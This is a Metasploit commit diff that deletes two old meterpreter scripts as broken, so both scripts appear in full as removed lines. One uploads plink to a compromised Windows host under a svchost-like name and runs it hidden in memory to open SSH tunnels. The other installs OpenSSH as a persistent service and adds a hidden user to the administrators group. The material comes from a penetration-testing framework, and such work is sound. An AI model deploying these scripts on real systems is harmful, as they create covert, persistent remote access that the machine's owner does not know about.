
remove a couple of broken meterpreter scripts (upstream is dead)

Brent Cook 1 year ago
parent
commit
252e80b9bf
2 changed files with 0 additions and 863 deletions
  1. 0
    455
      scripts/meterpreter/win32-sshclient.rb
  2. 0
    408
      scripts/meterpreter/win32-sshserver.rb

+ 0
- 455
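--- a/scripts/meterpreter/win32-sshclient.rb
+++ b/scripts/meterpreter/win32-sshclient.rb
@@ -1,455 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-#
-# Meterpreter script to deploy & run the "plink" commandline ssh-client
-# supports only MS-Windows-2k/XP/Vista Hosts
-#
-# Version 1.0
-# written by illegalguy
-#
-require 'net/http'
-require 'uri'
-meter_type = client.platform
-
-#
-# Options
-#
-
-@@exec_opts = Rex::Parser::Arguments.new(
-  "-h"  => [ false, "This help menu"],
-  "-f"  => [ true,  "Do not download plink.exe but use given file."],
-  "-U"  => [ true,  "Download from given URL instead of default one (http://the.earth.li/~sgtatham/putty)"],
-  "-H"  => [ true,  "The IP/hostname of the SSH-server to connect to !REQUIRED!"],
-  "-p"  => [ true,  "The port of the remote SSH-server (Default:22)"],
-  "-u"  => [ true,  "The username to use to login to the SSH-server !REQUIRED!"],
-  "-P"  => [ true,  "login with specified password"],
-  "-b"  => [ false, "disable all interactive prompts"],
-  "-R"  => [ true,  "Forward remote port to local address ([listen-IP:]listen-port:host:port)"],
-  "-L"  => [ true,  "Forward local port to remote address ([listen-IP:]listen-port:host:port)"],
-  "-D"  => [ true,  "Dynamic SOCKS-based port forwarding ([listen-IP:]listen-port)"],
-  "-C"  => [ false, "enable compression"],
-  "-X"  => [ false, "enable X11 forwarding"],
-  "-x"  => [ false, "disable X11 forwarding"],
-  "-A"  => [ false, "enable agent forwarding"],
-  "-a"  => [ false, "disable agent forwarding"],
-  "-1"  => [ false, "use SSH-protocol-version 1"],
-  "-2"  => [ false, "use SSH-protocol-version 2"],
-  "-4"  => [ false, "use IPv4"],
-  "-6"  => [ false, "use IPv6"],
-  "-i"  => [ true,  "private key-file for authentication"],
-  "-m"  => [ true,  "read remote command from file"],
-  "-s"  => [ false, "remote command is an ssh-subsystem(SSH2 only)"],
-  "-N"  => [ false, "Don`t start a shell/command (SSH2 only)"],
-  "-n"  => [ true,  "open tunnel in place of session (SSH-2 only) (host:port)"],
-  "-r"  => [ true,  "Set SSH-Server`s Hostkey as known Host in Windows-registry before starting the client"],
-  "-F"  => [ false, "Disable ram-mode, upload plink and run from disk. Attention : no auto-cleanup when using -N AND -F !"],
-  "-E"  => [ true, "Start process from memory as given (Target Machine`s!) Application (.exe) (Default: C:\\windows\\system32)"],
-  "-v"  => [ false, "Give additional (debugging-)output"]
-)
-
-def usage
-  print_line("plink ssh-client deploy+run script")
-  print_line("This script will upload and run a plink ssh-cient")
-  print_line(@@exec_opts.usage)
-  raise Rex::Script::Completed
-end
-
-# Wrong Meterpreter Version Message Function
-#-------------------------------------------------------------------------------
-def wrong_meter_version(meter = meter_type)
-  print_error("#{meter} version of Meterpreter is not supported with this Script!")
-  raise Rex::Script::Completed
-end
-#
-# Default parameters
-#
-
-plink = File.join(Msf::Config.data_directory, "plink.exe")
-
-#plinkurl = 'http://the.earth.li/~sgtatham/putty/latest/x86/plink.exe'
-#plinkurl = 'http://the.earth.li/~sgtatham/putty/0.60/x86/plink.exe'
-plinkurl = 'http://updates.metasploit.com/data/win32-ssh/plink.exe'
-license = <<-EOS
-PuTTY is copyright 1997-2010 Simon Tatham.
-Portions copyright Robert de Bath, Joris van Rantwijk, Delian Delchev, Andreas Schultz, Jeroen Massar, Wez Furlong, Nicolas Barry, Justin Bradford, Ben Harris, Malcolm Smith, Ahmad Khalifa, Markus Kuhn, Colin Watson, and CORE SDI S.A.
-
-Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
-
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL SIMON TATHAM BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.'
-EOS
-
-
-#
-# Define required functions
-#
-
-def upload(client,file,trgloc = nil)
-  if not ::File.exist?(file)
-    raise "File to Upload does not exists!"
-  else
-    if trgloc == nil
-      location = client.sys.config.getenv('TEMP')
-    else
-      location = trgloc
-    end
-    begin
-      if file =~ /S*(.exe)/i
-        fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
-      else
-        fileontrgt = "#{location}\\TMP#{rand(100)}"
-      end
-      print_status("Uploading #{file}....")
-      client.fs.file.upload_file(fileontrgt, file)
-      print_status("#{file} successfully uploaded to #{fileontrgt}!")
-    rescue ::Exception => e
-      print_status("Error uploading file #{file}: #{e.class} #{e}")
-    end
-  end
-  return fileontrgt
-end
-
-
-#
-# Option parsing
-#
-username = nil
-password = nil
-rhost = nil
-rport = 22
-manual = nil
-hostkey = nil
-batchmode = nil
-remotefwd = nil
-localfwd = nil
-socksfwd = nil
-enablecompression = nil
-enablex11fwd = nil
-disablex11fwd = nil
-enableagentfwd = nil
-disableagentfwd = nil
-sshv1 = nil
-sshv2 = nil
-ipv4 = nil
-ipv6 = nil
-keyfile = nil
-cmdfile = nil
-sshsubsys = nil
-noshell = nil
-nctunnel = nil
-processname = "C:\\windows\\system32\\svchost.exe"
-verbose = nil
-filemode = nil
-downloaded = nil
-
-@@exec_opts.parse(args) { |opt, idx, val|
-  case opt
-  when "-h"
-    usage
-  when "-H"
-    if !val
-      print_error("-H requires an argument !")
-      usage
-    end
-    rhost = val
-
-  when "-f"
-    if !val
-      print_error("-f requires an argument !")
-      usage
-    end
-    plink = val
-    if not ::File.exist?(plink)
-      print_error("Plink.exe not found/accessible!")
-      usage
-    end
-    manual = true
-
-  when "-r"
-    if !val
-      print_error("-r requires an argument !")
-      usage
-    end
-    hostkey = val
-
-  when "-p"
-    rport = val.to_i
-
-  when "-U"
-    if !val
-      print_error("-u requires an argument !")
-      usage
-    end
-    plinkurl = val
-
-  when "-u"
-    if !val
-      print_error("-u requires an argument !")
-      usage
-    end
-    username = val
-
-  when "-P"
-    if !val
-      print_error("-P requires an argument !")
-      usage
-    end
-    password = val
-
-  when "-b"
-    batchmode = true
-
-  when "-R"
-    if !val
-      print_error("-R requires an argument !")
-      usage
-    end
-    remotefwd = val
-
-  when "-L"
-    if !val
-      print_error("-L requires an argument !")
-      usage
-    end
-    localfwd = val
-
-  when "-D"
-    if !val
-      print_error("-D requires an argument !")
-      usage
-    end
-    socksfwd = val
-
-  when "-C"
-    enablecompression = true
-
-  when "-X"
-    enablex11fwd = true
-
-  when "-x"
-    disablex11fwd = true
-
-  when "-A"
-    enableagentfwd = true
-
-  when "-a"
-    disableagentfwd = true
-
-  when "-1"
-    sshv1 = true
-
-  when "-2"
-    sshv2 = true
-
-  when "-4"
-    ipv4 = true
-
-  when "-6"
-    ipv6 = true
-
-  when "-i"
-    if !val
-      print_error("-i requires an argument !")
-      usage
-    end
-    keyfile = val
-    if not ::File.exist?(keyfile)
-      print_error("keyfile not found or not accessible!")
-      usage
-    end
-
-  when "-m"
-    if !val
-      print_error("-m requires an argument !")
-      usage
-    end
-    cmdfile = val
-    if not ::File.exist?(cmdfile)
-      print_error("cmd-file not found/accessible!")
-      usage
-    end
-
-  when "-s"
-    sshsubsys = true
-
-  when "-N"
-    noshell = true
-
-  when "-n"
-    if !val
-      print_error("-n requires an argument !")
-      usage
-    end
-    nctunnel = val
-
-  when "-E"
-    if !val
-      print_error("-E requires an argument !")
-      usage
-    end
-    processname = val
-
-  when "-v"
-    verbose = true
-
-  when "-F"
-    filemode = true
-
-  else
-    print_error("Unknown option: #{opt}")
-    usage
-  end
-}
-
-# Check for Version of Meterpreter
-wrong_meter_version(meter_type) if meter_type != 'windows'
-
-
-if not rhost or not username
-  print_status("You must specify a hostname (-H) and username (-u)")
-  raise Rex::Script::Completed
-end
-
-#
-# Check if plink-file exists, and if not : download from putty-site first
-# Ask user before downloading
-#
-if not manual
-  if not ::File.exist?(plink)
-    print_status("plink.exe could not be found. Downloading it now...")
-    print_status(license)
-    plinkexe = Net::HTTP.get URI.parse(plinkurl)
-    File.open(plink, "wb") { |fd| fd.write(plinkexe) }
-    print_status("plink.exe has been downloaded to #{plink} (local machine). Please remove manually after use or keep for reuse.")
-    downloaded = true
-  end
-end
-
-#
-# Uploading files to target
-#
-cmdfileontrgt = upload(client, cmdfile) if cmdfile
-keyfileontrgt = upload(client, keyfile) if keyfile
-
-trg_filename = nil
-if filemode
-  print_status("-------Uploading plink -------")
-  trg_filename = upload(client, plink)
-else
-  trg_filename = plink
-end
-
-#
-# Build parameter-string
-#
-params = "-ssh "
-params << "-P #{rport} "          if not rport == 22
-params << "-l #{username} "
-params << "-pw #{password} "      if password
-params << "-batch "               if batchmode
-params << "-R #{remotefwd} "      if remotefwd
-params << "-L #{localfwd} "       if localfwd
-params << "-D #{socksfwd} "       if socksfwd
-params << "-C "                   if enablecompression
-params << "-X "                   if enablex11fwd
-params << "-x "                   if disablex11fwd
-params << "-A "                   if enableagentfwd
-params << "-a "                   if disableagentfwd
-params << "-1 "                   if sshv1
-params << "-2 "                   if sshv2
-params << "-4 "                   if ipv4
-params << "-6 "                   if ipv6
-params << "-m #{cmdfileontrgt} "  if cmdfileontrgt
-params << "-i #{keyfileontrgt} "  if keyfileontrgt
-params << "-s "                   if sshsubsys
-params << "-N "                   if noshell
-params << "-nc #{nctunnel} "      if nctunnel
-
-params << rhost
-
-
-#
-# Set Registry-Value before running the client, if the param was specified
-#
-hostkeyname = nil
-if not hostkey == nil
-  hostkeyname = "rsa2@#{rport}:#{rhost}"
-  print_status("Writing the Hostkey to the registry...")
-  client.run_cmd("reg setval -k HKEY_CURRENT_USER\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys -v #{hostkeyname} -d #{hostkey}")
-end
-
-#
-# Give additional output when -v is set
-#
-if verbose
-  print_status("You set the following parameters for plink :")
-  print_status(params)
-  print_status(processname)
-end
-
-#
-# Execute the client
-#
-
-print_status("-------Executing Client ------")
-
-p = nil
-if not filemode
-  p = client.sys.process.execute(trg_filename, params, {'Hidden' => true, 'Channelized' => true, 'InMemory' => processname})
-else
-  p = client.sys.process.execute(trg_filename, params, {'Hidden' => true, 'Channelized' => true})
-end
-
-if noshell == nil
-  client.console.run_single("interact #{p.channel.cid}")
-end
-
-if filemode
-  if not noshell == true
-    if verbose
-      print_status("Waiting 3 seconds to be sure the process was closed.")
-    end
-    sleep(3)
-    if verbose
-      print_status("Deleting the uploaded plink.exe...")
-    end
-    client.fs.file.rm(trg_filename)
-  else
-    print_status("Cannot automatically delete the uploaded #{trg_filename} ! Please delete it manually after stopping the process!")
-  end
-end
-
-if not keyfile == nil
-  if verbose
-    print_status("Waiting 1 second to be sure the keyfile is not in use anymore.")
-  end
-  sleep(1)
-  if verbose
-    print_status("Deleting the keyfile !")
-  end
-  if verbose
-    print_status(keyfile)
-  end
-  client.fs.file.rm(keyfile)
-end
-
-if not cmdfile == nil
-  print_status("You need to manually delete the uploaded #{cmdfile} !")
-end
-
-#
-# Delete the registry-key that may have been created
-#
-if not hostkey == nil
-  if verbose
-    print_status("Deleting the registry-key set by the script.")
-  end
-  client.run_cmd("reg deleteval -k HKEY_CURRENT_USER\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys -v #{hostkeyname}")
-end
-
-raise Rex::Script::Completed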

+ 0
- 408
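--- a/scripts/meterpreter/win32-sshserver.rb
+++ b/scripts/meterpreter/win32-sshserver.rb
@@ -1,408 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-#
-# meterpreter-script to deploy + run OpenSSH
-# on the target machine
-#
-# written by Oliver "illegalguy" Kleinecke
-# v.1.0 2010-04-25
-#
-
-require 'net/http'
-meter_type = client.platform
-#
-# Options
-#
-
-@@exec_opts = Rex::Parser::Arguments.new(
-  "-h"  => [ false, "This help menu"],
-  "-f"  => [ true,  "The filename of the OpenSSH-SFX to deploy. (Default is to auto-download from meterpreter.illegalguy.hostzi.com"],
-  "-U"  => [ true, "Download OpenSSH-SFX from given URL"],
-  "-u"  => [ true, "Add windows-user (autoadded to local administrators"],
-  "-p"  => [ true, "Password for the new user"],
-  "-r"  => [ false, "Uninstall OpenSSH + delete added user (ATTENTION: will only uninstall OpenSSH-installations that were deployed by this script!!)"],
-  "-I"  => [ true, "Install OpenSSH to the given directory"],
-  "-F"  => [ false, "Force overwriting of registry-values"],
-  "-S"  => [ true, "Set custom service description"],
-  "-N"  => [ true, "Set custom service name"],
-  "-m"  => [ true, "Do not start the OpenSSH-service after installation"],
-  "-t"  => [ true, "Set start-type of the service to manual (Default: auto)"]
-  )
-
-def usage
-  print_line("OpenSSH-server deploy+run script")
-  print_line("This script will deploy OpenSSH + run the SSH-server as a service")
-  print_line(@@exec_opts.usage)
-  raise Rex::Script::Completed
-end
-
-def createkey(key)
-  root_key, base_key = client.sys.registry.splitkey(key)
-  open_key = client.sys.registry.create_key(root_key, base_key)
-end
-
-def deletekey(key)
-  root_key, base_key = client.sys.registry.splitkey(key)
-  rtrncode = client.sys.registry.delete_key(root_key, base_key)
-  return rtrncode
-end
-
-def setval(key, value, data, type = "REG_SZ")
-  root_key, base_key = client.sys.registry.splitkey(key)
-  open_key = client.sys.registry.create_key(root_key, base_key, KEY_WRITE)
-  open_key.set_value(value, client.sys.registry.type2str(type), data)
-end
-
-def queryval(key, value)
-  root_key, base_key = client.sys.registry.splitkey(key)
-  hkey = client.sys.registry.open_key(root_key, base_key)
-  valdata = hkey.query_value(value)
-  return valdata.data
-end
-
-# Wrong Meterpreter Version Message Function
-#-------------------------------------------------------------------------------
-def wrong_meter_version(meter = meter_type)
-  print_error("#{meter} version of Meterpreter is not supported with this Script!")
-  raise Rex::Script::Completed
-end
-
-#
-# Default values
-#
-extractfilename = File.join(Msf::Config.data_directory, "/openssh-extract.sfx")
-manual = false
-username = "none"
-password = nil
-downloadurl = 'http://updates.metasploit.com/data/win32-ssh/openssh.sfx'
-uninstall = nil
-installpath = nil
-license = 'Please go to https://olex.openlogic.com/licenses/openssh-license for license information!'
-extractexe = nil
-warning = 'Script stopped. There are openssh/cygwin-registrykeys on the target host. Please uninstall the service(s) first, or use -F!'
-forced = nil
-servicename = "OpenSSHd"
-servicedesc = "OpenSSH-Server"
-noauto = false
-dirname = nil
-type = "auto"
-
-
-#
-# Option parsing
-#
-@@exec_opts.parse(args) { |opt, idx, val|
-  case opt
-
-  when "-h"
-    usage
-
-  when "-f"
-    if !val
-      print_error("-f requires the SFX-filename as argument !")
-      usage
-    end
-    extractfilename = val
-    if not ::File.exist?(extractfilename)
-      print_error("OpenSSH-SFX not found/accessible!")
-      usage
-    end
-    manual = true
-
-  when "-U"
-    if !val
-      print_error("-U requires the download-URL for the OpenSSH-SFX as argument !")
-      usage
-    end
-    downloadurl = val
-
-  when "-p"
-    if !val
-      print_error("-p requires the password (for the windows-user to add) as argument !")
-      usage
-    end
-    if val.length > 14
-      print_error("Password must not be longer than 14chars due to \"net user .. /ADD\" restrictions, sorry !")
-      usage
-    end
-    password = val
-
-  when "-u"
-    if !val
-      print_error("-u requires the username (for the windows-user to add) as argument!")
-      usage
-    end
-    username = val
-
-  when "-r"
-    uninstall = true
-
-  when "-I"
-    if !val
-      print_error("-I requires a directory-name to use as installpath")
-      usage
-    end
-    dirname = val
-
-  when "-F"
-    forced = true
-
-  when "-S"
-    if !val
-      print_error("-S requires s custom string to use as the service-description")
-      usage
-    end
-    servicedesc = val
-
-  when "-N"
-    if !val
-      print_error("-N requires a custom string to use as service-name")
-      usage
-    end
-    servicename = val
-
-  when "-m"
-    noauto = true
-
-  when "-t"
-    type = manual
-
-  else
-    print_error("Unknown option: #{opt}")
-    usage
-  end
-}
-
-# Check for Version of Meterpreter
-wrong_meter_version(meter_type) if meter_type != 'windows'
-
-#
-# Uninstall if selected
-#
-if uninstall
-  username = nil
-  servicename = nil
-  begin
-    dirname = queryval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/", "native")
-  rescue
-    print_status("Could not find any sshd installed by this script. Please remove manually!")
-    deletekey("HKLM\\Software\\Cygnus\ Solutions")
-    raise Rex::Script::Completed
-  end
-  uninstallfile = "#{dirname}\\etc\\uninst.bak"
-  uf = client.fs.file.new(uninstallfile, "rb")
-  while not uf.eof?
-    linesarray = uf.read.split("\r\n")
-    username = linesarray[0]
-    servicename = linesarray[1]
-  end
-  uf.close
-  # stop sshd-service, delete it, delete user + files afterwards
-  print_status("Stopping the #{servicename}-service....")
-  client.sys.process.execute("cmd.exe", "/c sc stop #{servicename}")
-  sleep 2
-  print_status("#{servicename} has been stopped.")
-  print_status("Deleting the #{servicename}-service....")
-  client.sys.process.execute("cmd.exe", "/c sc delete #{servicename}")
-  sleep 1
-  print_status("#{servicename} has been deleted.")
-  unless username.strip == "none"
-    print_status("Deleting user #{username}......")
-    client.sys.process.execute("cmd.exe", "/c net user #{username} /DELETE")
-    print_status("User #{username} has been deleted")
-  end
-  print_status("Deleting the directory #{dirname}....")
-  client.sys.process.execute("cmd.exe", "/c rmdir /S /Q #{dirname}")
-  print_status("#{dirname} has been deleted.")
-  print_status("Deleting regkeys ....")
-  deletekey("HKLM\\Software\\Cygnus\ Solutions")
-  print_status("Registry-keys have been deleted .")
-  print_status("Uninstall completed!")
-  raise Rex::Script::Completed
-end
-
-#
-# Check for OpenSSH/Cygwin - Regkeys first and bail out if they exist
-#
-root_key, base_key = client.sys.registry.splitkey("HKLM\\Software\\Cygnus\ Solutions")
-open_key = client.sys.registry.open_key(root_key, base_key)
-keys = open_key.enum_key
-if ( keys.length > 0)
-  if not forced
-    print_error(warning)
-    raise Rex::Script::Completed
-  end
-end
-
-#
-# If file doesn`t exist and file was not manually specified : auto-download
-#
-
-if manual == false
-  if not ::File.exist?(extractfilename)
-    print_status("openssh-extract.sfx could not be found. Downloading it now...")
-    print_status(license)
-    extractexe = Net::HTTP.get URI.parse(downloadurl)
-    open(extractfilename, "wb") { |fd| fd.write(extractexe) }
-    print_status("openssh-extract.sfx has been downloaded to #{extractfilename} (local machine). Please remove manually after use or keep for reuse.")
-    downloaded = true
-  end
-end
-
-#
-# Generate sshd-dir + upload file to client
-#
-if dirname == nil
-  dirname = client.fs.file.expand_path("%TEMP%") + '\\' + "#{rand(36 ** 8).to_s(36).rjust(8,"0")}"
-  print_status("Creating directory #{dirname}.....")
-  client.fs.dir.mkdir(dirname)
-else
-  if  !::File.exist?(dirname) && !::File.directory?(dirname)
-    print_status("Creating directory #{dirname}.....")
-    client.fs.dir.mkdir(dirname)
-  end
-end
-fileontrgt = "#{dirname}\\#{rand(36 ** 8).to_s(36).rjust(8,"0")}.exe"
-print_status("Uploading #{extractfilename} to #{fileontrgt}....")
-client.fs.file.upload_file(fileontrgt, extractfilename)
-print_status("#{extractfilename} successfully uploaded to #{fileontrgt}!")
-
-
-# Get required infos about the target-system
-clientenv = Hash.new
-envtxtname = "#{dirname}\\#{rand(36 ** 8).to_s(36).rjust(8,"0")}.txt"
-client.sys.process.execute("cmd.exe", "/c set > #{envtxtname}")
-
-fd = client.fs.file.new(envtxtname, "rb")
-while not fd.eof?
-  linesarray = fd.read.split("\r\n")
-  linesarray.each { |line|
-    currentline = line.split('=')
-    envvarname = currentline[0]
-    envvarvalue = currentline[1]
-    clientenv[envvarname] = envvarvalue
-  }
-end
-fd.close
-
-# Do not continue if client-os is not valid
-
-unless clientenv["OS"] == 'Windows_NT'
-  print_error("This script will run on Windows-NT based OS only!")
-  raise Rex::Script::Completed
-end
-
-
-# Extract the files
-
-print_status("Extracting the files ...")
-client.sys.process.execute(fileontrgt)
-sleep 3
-print_status("Files extracted .. ")
-
-#
-# Import required registry keys
-#
-homebase = clientenv["ALLUSERSPROFILE"].slice(0,clientenv["ALLUSERSPROFILE"].rindex('\\'))
-
-createkey("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2")
-createkey("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/")
-setval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/", "native", dirname)
-setval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/", "flags", 10, "REG_DWORD")
-createkey("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/home")
-setval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/home", "native", homebase)
-setval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/home", "flags", 10, "REG_DWORD")
-createkey("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/usr/bin")
-setval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/usr/bin", "native", "#{dirname}/bin")
-setval("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\mounts\ v2\\/usr/bin", "flags", 10, "REG_DWORD")
-createkey("HKLM\\Software\\Cygnus\ Solutions\\Cygwin\\Program Options")
-
-#
-# Provide ACL for System User
-#
-client.sys.process.execute("cacls.exe", "#{dirname} /E /T /G SYSTEM:F")
-
-#
-# Add windows-user if requested
-#
-unless username == "none"
-  if password == nil
-    print_error("You need to provide a nonempty password for the user with the \"-p\"-parameter!")
-    usage
-  end
-
-  #Get localized name for windows-admin-grp
-  admingrpname = nil
-  client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\mkgroup.exe -l > #{dirname}\\groupnames.txt")
-  sleep 1
-  fd = client.fs.file.new("#{dirname}\\groupnames.txt", "rb")
-  while not fd.eof?
-    linesarray = fd.read.split("\n")
-    linesarray.each { |line|
-      if line[0..4] =~ /[aA]dmin/
-        admingrpname = line.slice!(/[aA]dmin[a-z]+/)
-      end
-    }
-  end
-  fd.close
-  sleep 2
-  client.fs.file.rm("#{dirname}\\groupnames.txt")
-  print_line("Adding user #{username}....")
-  client.sys.process.execute("cmd.exe", "/c net user #{username} #{password} /ADD /HOMEDIR:#{dirname}")
-  print_line("Add user #{username} to #{admingrpname}")
-  client.sys.process.execute("cmd.exe", "/c net localgroup #{admingrpname} #{username} /ADD")
-end
-
-#
-# Generate /etc/passwd + /etc/group files
-#
-print_status("Generating /etc/passwd + /etc/group files....")
-client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\mkpasswd.exe -l > #{dirname}\\etc\\passwd")
-client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\mkgroup.exe -l > #{dirname}\\etc\\group")
-
-#
-# Generate SSH-keypairs
-#
-print_status("Generating SSH-keys .....")
-client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\ssh-keygen.exe -t dsa -f /etc/ssh_host_dsa_key -N \"\"")
-sleep 1
-client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\ssh-keygen.exe -t rsa1 -f /etc/ssh_host_key -N \"\"")
-sleep 1
-client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\ssh-keygen.exe -t rsa -f /etc/ssh_host_rsa_key -N \"\"")
-
-#
-# Add OpenSSH - Service
-#
-print_status("Adding OpenSSHd-Service.......")
-if type == manual
-  client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\cygrunsrv.exe --install #{servicename} --path /usr/sbin/sshd --args \"-D\" --dep \"Tcpip\" --stderr \"/var/log/opensshd.log\" --env \"CYGWIN=binmode ntsec tty\" --type manual --disp \"#{servicedesc}\"")
-else
-  client.sys.process.execute("cmd.exe", "/c #{dirname}\\bin\\cygrunsrv.exe --install #{servicename} --path /usr/sbin/sshd --args \"-D\" --dep \"Tcpip\" --stderr \"/var/log/opensshd.log\" --env \"CYGWIN=binmode ntsec tty\" --disp \"#{servicedesc}\"")
-end
-print_status("Service successfully installed!")
-sleep 2
-
-#
-# Save "settings" to txtfile, to be able to del correct user etc afterwards
-#
-uninstallfile = "#{dirname}\\etc\\uninst.bak"
-uf = client.fs.file.new(uninstallfile, "w")
-uf.write "#{username} \r\n"
-uf.write "#{servicename} \r\n"
-uf.close
-
-
-# Run OpenSSH-service unless noauto was specified
-unless noauto
-  print_status("Starting OpenSSH-Service....")
-  client.sys.process.execute("cmd.exe", "/c net start #{servicename}")
-  sleep 1
-  print_status("OpenSSHd has been started!")
-end
-
-# Display OpenSSH-Hostkey, so that user may pass this to sshclient-script directly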
